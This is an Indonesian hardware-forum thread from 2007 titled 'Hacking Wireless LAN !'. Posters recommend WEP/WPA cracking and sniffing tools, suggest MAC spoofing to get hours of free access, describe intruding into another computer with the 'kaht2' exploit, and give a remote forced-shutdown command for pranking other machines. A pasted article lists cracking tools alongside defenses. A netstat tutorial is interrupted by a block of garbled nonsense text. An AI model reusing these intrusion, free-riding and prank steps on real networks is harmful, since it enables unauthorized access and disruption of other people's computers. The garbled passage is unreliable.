tools ini bisa sangant berguna untuk browsing sema yang masuk sebuah jaringan, Cain And Abel
cari lewat google aj.... pasti dapat, install dan jalankan, disitu anda bisa membuka kompi-kompi
yang adapada jaringan, meskipun worgroupnya berbeda...........................
aku bingung buat antena yang ada tutorinya diatas, konek ke PCnya ake port apaan??? pake serial?
ato pake USB?? kan ditutorial cuman antenanya doang!!!!!!!!!!!1

Logged

--------------------------------------------------------------------------------
"Milikilah Sesuatu Menurut Kebutuhan, Bukan menurut Keinginan"....

arwan
Trade Count: (0)
Interest..

Posting Quality: -1
Offline

Last Login:June 11, 2007, 11:16:42 PM


Posts: 11
HY$4.00 credits

View Inventory
Send Money to arwan

never ending learning

Re: Hacking Wireless LAN !


« Reply #10 on: April 07, 2007, 06:23:01 AM »

--------------------------------------------------------------------------------
Netstumbler, Kismet,dan Aeroneet/aeropeek

its stuf...
kalo make kismet kan bisa keliatan mac address nya kalo dia ga aktif bisa kita manfaatkan dengan
mengganti MAC address kita... atau anda mau mencoba "man in the middle"?

aeropeek bisa membuka WEP AP entah kalo WPA... (belum nyoba)


biasanya ASCII yang dienkripsi jadi kita cari kesamaannya saja... dan mungkin bisa dibagi 4 atao
semacamnya biar ketemu ASCII codenya...
ini juga bisa dimanfaatkan untuk man in the middle attack

kalo ada yang punya aeropeek softwarenya mbo aku dibagi... software ku rusak kena jeefo, dan itu
adalah masternya.... kalo download lagi males (trial)

cmiiw

Logged

--------------------------------------------------------------------------------
i have my own journey

lelahana
Trade Count: (0)

Posting Quality: 0
Offline

Last Login:November 10, 2007, 04:43:39 PM


Posts: 4
HY$1.00 credits

View Inventory
Send Money to lelahana

Re: Hacking Wireless LAN !


« Reply #11 on: April 09, 2007, 04:05:09 PM »

--------------------------------------------------------------------------------
sadisssssss....
kckckckckckc....wah semuanyajago pisan..
tapi kalo minta diajarin caranya,ada yang mau ga?
jadi pengen nih...penasaran buanget....tapi ga tau caranya...
ajarin dunks.. :'( :'( :'( :'( :'( :'(

Logged

arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 2
Offline
Last Login:October 19, 2009, 02:03:55 PM
Posts: 130
HY$40.00 credits

View Inventory
Send Money to arbangun

aRB'S Coorp

Re: Hacking Wireless LAN !


« Reply #12 on: April 13, 2007, 12:52:50 PM »

--------------------------------------------------------------------------------
NUAMBAAAHHIIINN...waaakaaakaa .....

coba pake APSniffer


trus ethereal ( wireshark )
ama APsnort

pake tu tool, klo ga slh kita bisa dpet pass ama username buat log-on.

hmmm nih ada lagi buat deteksi penyusup komputer bisa jg dicoba pake cara ini nih

Quote
== MENDITEKSI PENYUSUP JARINGAN LEWAT DOS ==

BEGIN

*PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada
yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau
mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat
atau mendetiksinya hanya denga dos command !

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.


-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.

-r Displays the routing table.


-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.

hurried step towards the table bedroom living room in


the house ahmadi iksan haris nuk wulan tito wanted to
take his glasses like a child
1000000000000000000000000000000000000000000
000000000000000000 forces continue to follow the
great iskandar farid wulan ahmadi extraordinary
spectacles to take children Darmo
10000000000000000000000000000000000000 darmi
troops followed them Hurip adenan Mulyani would
like to take glasses isang wanted to take his glasses to
take the plate with a colorful married servants who
worked as a cook clean sweep of the room with
colorful married anywhere agus married with colors
like to take glasses lilik want to take the glasses to
take glasses Nunus andi mas tito Theresa wanted to
take a child glasses follow
1000000000000000000000000000000000
extraordinary iskandar memngambil also wanted
glasses so in the closet to retrieve his glasses mufti of
children and law mufti who wanted to take the glasses
to a law that opened the closet darmi
100000000000000000000000000000000000 Darmo
children eat and drink with the following colors
interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*
sebelah nama pc itu adalah port yang digunakan untuk hubungan .
netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State


TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*
Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada
port yang dibuka kaht2 untuk menge sploit suatu komputer .
lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang
menyusup ke komputer kita . Gunakan nbtstat -a
C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status


---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~ME..........<00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng

atau kalo mau iseng sebentar coba nigh pake rumus ini

Quote
cari taw host name si computer tujuan.. pake angry scan juga bisa.
habis itu ketik deh di command prompt misalnya :
c:/shutdown -s -f -m \\abcd -t 20
habis tu dalam 20 detik, computer client akan shutdown.. keke... :'(

« Last Edit: April 13, 2007, 12:55:48 PM by arbangun » Logged

--------------------------------------------------------------------------------
E2140 @3,2 GHz|MOBO Biostar 945G Micro 775SE Ext|A-Data 2x1Gb 800 PC6400|DVD RW
LiteOn|HIS X700Pro IceQ 256/128MB PCIe|LG LCD monitor 21"
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

arwan
Trade Count: (0)
Interest..

Posting Quality: -1
Offline

Last Login:June 11, 2007, 11:16:42 PM


Posts: 11
HY$4.00 credits

View Inventory
Send Money to arwan

never ending learning

Re: Hacking Wireless LAN !


« Reply #13 on: April 14, 2007, 04:22:42 AM »

--------------------------------------------------------------------------------
lho mas kalo remote system komputer korban nya ga diaktifin kan ga bisa di shutdown korbannya
dengan perintah C:\shutdown .... cmiiw

yup,ethereal berfungsi membaca (baca:capture) pesan atau data yang mengalir pada jaringan,
sehingga aliran data yang aktif bisa terlihat, apa saja yang dibuka, data apa yang dikirimkan apakah
email,friendster atau semacamnya,tapi tampaknya belum bisa untuk data yang melewati https atau
secure socket layer, betulkan bila saya salah

« Last Edit: April 14, 2007, 04:54:26 AM by arwan » Logged

arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 2
Offline

Last Login:October 19, 2009, 02:03:55 PM


Posts: 130
HY$40.00 credits

View Inventory
Send Money to arbangun

aRB'S Coorp

Re: Hacking Wireless LAN !


« Reply #14 on: April 16, 2007, 04:13:39 PM »
--------------------------------------------------------------------------------
SELENGKAPNYA DARI TAMBAHAN KEMAREN.....BIAR PINTER PAKE BHS. ENGGRIS
YA...

Wireless Hacking Tools

Anyone interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities
will need a good set of base tools with which to work. Fortunately, there are an abundance of free
tools available on the Internet. This list is not meant to be comprehensive in nature but rather to
provide some general guidance on recommended tools to build your toolkit.

Finding Wireless Networks

Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being
broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login

You are not allowed to view links.


Register or Login
kISMET[url]http://www.kismetwireless.net/Kismet
[/url] – One of the key functional elements missing from NetStumbler is the ability to display
Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you
should realize that Access Points are routinely broadcasting this info; it just isn’t being
read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very
critical in finding wireless networks.

You are not allowed to view images.


Please register or login

Attaching to the Found Wireless Network

Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

You are not allowed to view images.


Please register or login
You are not allowed to view links.
Register or Login
CowPattyCowPatty
– This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for
home Wireless Security. This program simply tries a bunch of different options from a dictionary
file to see if one ends up matching what is defined as the Pre-Shared Key.

You are not allowed to view images.


Please register or login

You are not allowed to view links.


Register or Login
ASLeapASLeap
– If a network is using LEAP, this tool can be used to gather the authentication data that is being
passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the
authentication like other “real” EAP types, which is the main reason why LEAP can be broken.

You are not allowed to view images.


Please register or login

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.

Ethereal – While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

You are not allowed to view images.


Please register or login

You are not allowed to view images.


Please register or login

The aforementioned utilities, or similar ones, will be necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.

NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.
Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure
your WLAN is protected by using advanced Authentication and Encryption

Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).

Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of residing in a dictionary file that would be used to try and guess your key and/or would
take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to
protect the authentication and limit the amount of incorrect guesses that would take place before the
account is locked-out. If using certificate-like functionality, it could also validate the remote system
trying to gain access to the WLAN and not allow a rogue system access.

ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.

Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.

Logged

jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #15 on: April 16, 2007, 10:42:34 PM »

--------------------------------------------------------------------------------
Ato pke cara fuzzing
Yg ini lebih santai, lebih "sopan"..
Yg jelas gak cmn berguna buat WLAN doang..

info lengkap : You are not allowed to view links.


Register or Login

Logged

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #16 on: April 18, 2007, 04:04:48 PM »

--------------------------------------------------------------------------------
kalo yang MAC adress, bukannya ada tuh software buat ganti MAC adress??
ada yang pernah coba blom?kan enak tu kalo bisa diganti, bisa berjam-jam akses gratis....hehee

Quote from: silverx on March 17, 2007, 11:41:56 AM


tools ini bisa sangant berguna untuk browsing sema yang masuk sebuah jaringan, Cain And Abel
cari lewat google aj.... pasti dapat, install dan jalankan, disitu anda bisa membuka kompi-kompi
yang adapada jaringan, meskipun worgroupnya berbeda...........................
aku bingung buat antena yang ada tutorinya diatas, konek ke PCnya ake port apaan??? pake serial?
ato pake USB?? kan ditutorial cuman antenanya doang!!!!!!!!!!!1

kalo ndak salah, dulu saya juga pernah mbaca artikel sejenis. ya kabelnya kan diikat ke antena
WLAN. gak tau deh, kalo WLAN yang gak pake antena bisa apa ndak.jadi bukan pake usb,
serial.kalo ndak salah kan diameter kalengnya juga harus disesuaikan to?

Logged

Panji
[Here To Help]
[ SupeR ADMIN ]
Trade Count: (2)
[ HYPER ]

Posting Quality: 72
Offline

Last Login:Today at 01:44:28 AM


Posts: 2515
HY$9654.00 credits
View Inventory
Send Money to Panji

Everything (better/worse) start from '1'

Re: Hacking Wireless LAN !


« Reply #17 on: April 18, 2007, 05:40:04 PM »

--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!

Logged

--------------------------------------------------------------------------------
just trying to serve You...
You are not allowed to view images.
Please register or login
work as hard as U can.. and .. be as simple as U can, to be part of Others!

bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #18 on: April 19, 2007, 03:19:49 PM »

--------------------------------------------------------------------------------
WEP Crack bisa anda baca di HyperMedia Magazine edisi 2.

Logged

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #19 on: April 20, 2007, 11:48:18 AM »

--------------------------------------------------------------------------------
bro semua, mo nanya nih, kalo lewat cain and abel dah dapet ip adress, port, ama SSID, trus gimana
biar bisa nge-remote komputer tujuan??

Logged

aghya
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 0
Offline

Last Login:June 14, 2008, 09:49:04 PM


Posts: 109
HY$99.00 credits

View Inventory
Send Money to aghya

Re: Hacking Wireless LAN !


« Reply #20 on: June 23, 2007, 07:53:36 PM »

--------------------------------------------------------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!

Wah..bagus itu.. aku tunggu ...edisi 7 tanggal terbitnya kapan?

Logged

--------------------------------------------------------------------------------
Venice 3000+ @2600 (daily)..so far
DFI LP UT NF4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa Geforce 6600 GT
Samsung SATA 80
EXtreme 500

inou
nubi all the time... :D
[ Community Member ]
Trade Count: (2)
[ EXTREME ]

Posting Quality: 1
Offline

Last Login:July 06, 2009, 03:57:59 AM


Posts: 563
HY$82.00 credits

View Inventory
Send Money to inou

.: Lets Fill The World With Smile :.

Re: Hacking Wireless LAN !


« Reply #21 on: November 20, 2007, 04:08:46 PM »

--------------------------------------------------------------------------------
halow sadayana,ada yg punya AirPcap yg full ndak?bagi donk

Logged

--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

OFFICIAL TEAM:
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or loginYou are not allowed to view images.
Please register or login

@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]
Posting Quality: -11
Offline

Last Login:January 01, 2010, 12:07:33 PM


Posts: 724
HY$287.00 credits

View Inventory
Send Money to @5ph@lt

i'm sick of........

Re: Hacking Wireless LAN !


« Reply #22 on: November 21, 2007, 02:50:19 PM »

--------------------------------------------------------------------------------
HYEM akan meluncurkan DISTRO "Hyper-TUX's",.. sebuah distro khusus yg dilengkapi tool2
lengkap untuk underground hacking dan air attack.. !! tunggu aja... di Bonus HYEM DVD edisi 7 !!

koq ga ada ya?

Logged

--------------------------------------------------------------------------------
Sempron LE1150 I Abit NF-M2S I Elixir DDR2 667 1Gx2 I WDC 40GB I Seagate 120GB I BenQ
DW2000 I Simbokde 500W PPFC I Thermaltake iFlash 120mm I Compaq S510 15"
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

You are not allowed to view links.


Register or Login

1b3l_jubel
Trade Count: (0)
Interest..

Posting Quality: -1
Offline

Last Login:September 29, 2008, 03:49:00 PM


Posts: 11
HY$22.00 credits
View Inventory
Send Money to 1b3l_jubel

Re: Hacking Wireless LAN !


« Reply #23 on: July 31, 2008, 08:31:10 PM »

--------------------------------------------------------------------------------
tak coba dah.......

Logged

@5ph@lt
[ Community Member ]
Trade Count: (0)
[ EXTREME ]

Posting Quality: -11


Offline

Last Login:January 01, 2010, 12:07:33 PM


Posts: 724
HY$287.00 credits

View Inventory
Send Money to @5ph@lt

i'm sick of........

Re: Hacking Wireless LAN !


« Reply #24 on: July 31, 2008, 08:43:51 PM »

--------------------------------------------------------------------------------
hyem ga jadi keluarin distro ya?

Logged

Pages: [1] Go Up Print

GoogleTagged: netstat socket windows abit merubah wireshark kampus source enkripsi address
online hak org clien kita apa coding tool netview sofware

« previous next »
Jump to: Please select a destination: ----------------------------- == T H E - C O R E == [OFFICIAL
BOARD] ----------------------------- => Official FAQ, Rules, & Forum Guide => Official Event =>
Official Folding/Grid Team [Hyper-GRID] => Official Merchandise => REVIEW ===> Mainboard
Review ===> Memory Review ===> Display Card Review ===> CPU Review ===> Pheriperal
Review ===> Software Review ===> Games Review => News & Live Chat Discuss ! ===>
Hardware News & Articles ===> Software News & Articles ===> Games News & Articles =>
Online Store & Pricelist (JUST ENABLED ;) ) ===> Intel System ===> AMD System ===> |
HYEM PURWOREJO | ===> | HYEM PALEMBANG | ----------------------------- == HYPER
X-3ME [ADVANCED & SPECIALIST] == |only in English| ----------------------------- => =
WORLD RECORD ADICT = => =| X-3ME Suicide Overclocking Championship |= ===> SuperPi
Team ===> Sisoftsandra Team ===> PC Mark Team ===> 3DMark Team ===> Aquamark Team
===> Mainboard Moding ----------------------------- == H A R D W A R E==
----------------------------- => Basic System Troubleshooting, PC System & Overclocking Guide =>
PC Modding => Processor ===> AMD ===> INTEL => Mainboard ===> Abit => Memory ===>
ADATA => Power Supply ===> FSP => Display Card ===> POV => Optical & Storages =>
Cooling => Sound & Speaker Devices => Pheriperal & Network => Notebook & PDA
----------------------------- == S O F T W A R E== ----------------------------- => Games ===> Games
F.A.Q. ===> Game Cheat & Trainer ===> Multiplayer Game => Operating System ===> Windows
===> Linux ===> Macintosh => Programing => Security => Audio Freak => Webmastering => 2D
Designer and Animation [FOTO-VIDEO] => 3D Modelling and Animation => Other Importance
Software ===> BIOS & ROM ===> Driver ===> Overclocking Tools ----------------------------- ==
ADD-ON BOARD == ----------------------------- => HOBBY ===> Angkringan Ruwet x2 ===>
Angkringan Ngakak

Permissions

You can't post new topics.


You can't post replies.
You can't post attachments.
You can't modify your posts.
--------------------------------------------------------------------------------
BBCode Enabled
Smilies Enabled
[img] Enabled
HTML Enabled

TinyPortal v.1.0.6 beta 2 © Bloc


Powered by SMF 1.1.10 | SMF © 2006-2009, Simple Machines LLC
Theme by |Panji|
MySQL | PHP | XHTML | CSS
Page created in 0.868 seconds with 62 queries. (Pretty URLs adds 0.097s, 1q)
Loading...Loading...

Terjemahkan dari: Bahasa IndonesiaInggris—Deteksi bahasa—AfrikaansAlbaniaArabBahasa


IndonesiaBelandaBulgarByelorusiaCekDanskEstiFarsiGalisiaHindiIbraniInggrisIrlandiaIslanItaliaJ
epangJermanKatalanaKoreaKreol Haiti
ALPHAKroatLatviLituaviMagyarMakedoniaMaltaMandarinMelayuNorskPilipinoPolskiPortugisPr
ancisRumaniaRusiaSerbSlovenSlowakiaSpanyolSuomiSwahiliSwenskThaiTurkiUkrainaVietnamW
alesYiddiYunani
Terjemahkan ke: InggrisBahasa Indonesia—AfrikaansAlbaniaArabBahasa
IndonesiaBelandaBulgarByelorusiaCekDanskEstiFarsiGalisiaHindiIbraniInggrisIrlandiaIslanItaliaJ
epangJermanKatalanaKoreaKreol Haiti
ALPHAKroatLatviLituaviMagyarMakedoniaMaltaMandarin (Aks. Sederhana)Mandarin (Aks.
Tradisional)MelayuNorskPilipinoPolskiPortugisPrancisRumaniaRusiaSerbSlovenSlowakiaSpanyol
SuomiSwahiliSwenskThaiTurkiUkrainaVietnamWalesYiddiYunani

Terjemahan Bahasa Indonesia ke InggrisTunjukkan huruf latin


Home Forum Help Arcade Calendar Shop LIVE CHAT button GoogleTagged Login Register

Input To officials Forum HYPERMEDIA


You are not allowed to view links.
Register or Login
click here and post

The Unordinary
Enter your search terms
Web hyem.org
Submit search form

You are not allowed to view images.


Please register or login

Welcome, Guest. Please login or register.


March 06, 2010, 05:55:13 PM
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length
Pricelist Update!!
PriceList UPDATE => You are not allowed to view links.
Register or Login (last updated 2009 Oct 21)

Dragon Xitro Hyper-3D Design AP1


II Phenom X4 Deneb From X2, DFI LP DK 790FXB-M2RS, Palit HD 4850, OCZ Gold Edition 2 x
1GB, 500 GB WDC 16 MB, Enhance 400W ATX + True
PROMO: Rp. 4,978,765, --

Xitro Hyper-Fire Dragon AP1


Kuma Athlon X2 7750 +, abit AX78 AMD 770 / SB600 CrossFire Platform OTES Dragon, Saphire
HD4830/HD4770, 2x2G OCZ Gold Ed 8500 CL5, WDC 320 GB 16 MB, Foxconn Case + PSU
PROMO: Rp. 4,498,765, --
BEST SELLER ...!!!!

Hyper XITRO Designer AP2


Core2Quad Q8400, DFI LP GF9400-T2RS Junior Hybrid SLI, OCZ Fatality Edition 2X2G, WDC
500 GB 16 MB, Foxconn Case + PSU True (Graph DESIGNER PC)
PROMO: Rp. 4,454,545, --

Toxic Hyper-Dragon Xitro ACF


II Phenom X4 from 550BE, DFI LP BI-M35 CrossFireX 785G Dragon Platform, HD4830 Palit
256bit, DDR3 OCZ Fatality Edition 2X2G, 500 GB WDC, 400W Enhance True + (FREE
VENDETA II for Fist buyer everyday)
PROMO: Rp. 4,976,543, --

Hyper-Dragon Xitro Epix


Athlon II X2@3.5Ghz from sargas 140 + BIOSTAR TA785GE 128 CF, Palit HD4650 Super
512MB 128bit, DDR2 2X1G, 160GB WDC 16 MB, ATX 400W
PROMO: Rp. 2,525,252, --

| LCD 15.6 "+ Key + Mouse = Rp. 950rb | LCD 19" + Key + Laser Mouse = Rp.1.300rb | LCD 16
"+ Key + Mouse = Rp. 990rb |

Palit HD4870
Palit HD4870 Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases
is still 256bit graphics lbh dr 5770 128bit superior, let alone reply we see from the price /
performancenya)
PROMO: $ 150

Palit HD4850
Palit HD4830 DDR3, 512MB, 256bit, Core: 575 / Mem: 1800Mhz + HDMI
Youngest brother of the family RV770, Still be the Price / Performance King!
PROMO: $ 90

Palit HD3850 Super DDR3


RV 670, 256 MB DDR3, 256bit, 670MHZ, 1660MHZ, 319

With DDR3, High-end card is legendary high-end display card under $ 100, especially for high-
OC .. This babe is the Most Value King!
PROMO: $ 78, 512M: $ 65

ALL AVAILAVBE

Chat Now!

[more]
Last 20 Shouts:
-------------------------------------------------- ------------------------------

Panji
Today at 01:44:28 AM
Good for Hendy hyem .. lu ganyangka win bro ..
an35
Today at 12:50:18 AM
let kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
quiet mas dab ...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do that 'an: p
B.U.G.S
Yesterday at 05:05:04 PM
@ Tito Haga
nge's iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED .. MOMED marai ngunu
wae .. wakakaka ..
coolwin
Yesterday at 04:58:26 PM
BEST UPDATE CHECK today CF KILL !!!!! I'M IN RANK 2 wakakakakaka
Tito Haga
Yesterday at 02:51:11 PM
@ BUGS
hahahaha ... .. bar Tangi sori2 turu ngono kui ngemoved yes ... haha
donkey
Yesterday at 01:57:41 PM
wakakakaka ....
blackshield ™
Yesterday at 11:54:06 PM
cilukkkkkkkk
baaaaaaa ...
B.U.G.S
Yesterday at 10:39:35 PM
Jove, moved ming kok isine kabeh kie ..? nek nge-mending move topic lawas not dikei redirection
ga kang ..
Tito Haga
Yesterday at 08:26:27 PM
wakakakakka ... means the same boat
sadnux
Yesterday at 08:20:42 PM
its not about bersih2, tp itu lho yg in sign writing about college yg
parent often say kek gitu pas kl ane marahin T_T
Tito Haga
Yesterday at 08:13:04 PM
Hahahahaha ... yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah::
sadnux
Yesterday at 08:09:47 PM
beautiful morning .. tp yg ketendang same directly pack signaturenya ditto
wakakakak
Tito Haga
Yesterday at 07:56:09 PM
morning kang
sadnux
Yesterday at 07:47:53 PM
met pagi all
Tito Haga
Yesterday at 06:34:29 PM
weh ... kang banner onlen
Panji
Yesterday at 06:13:51 PM
miss u all ...
Tito Haga
Yesterday at 05:30:56 PM
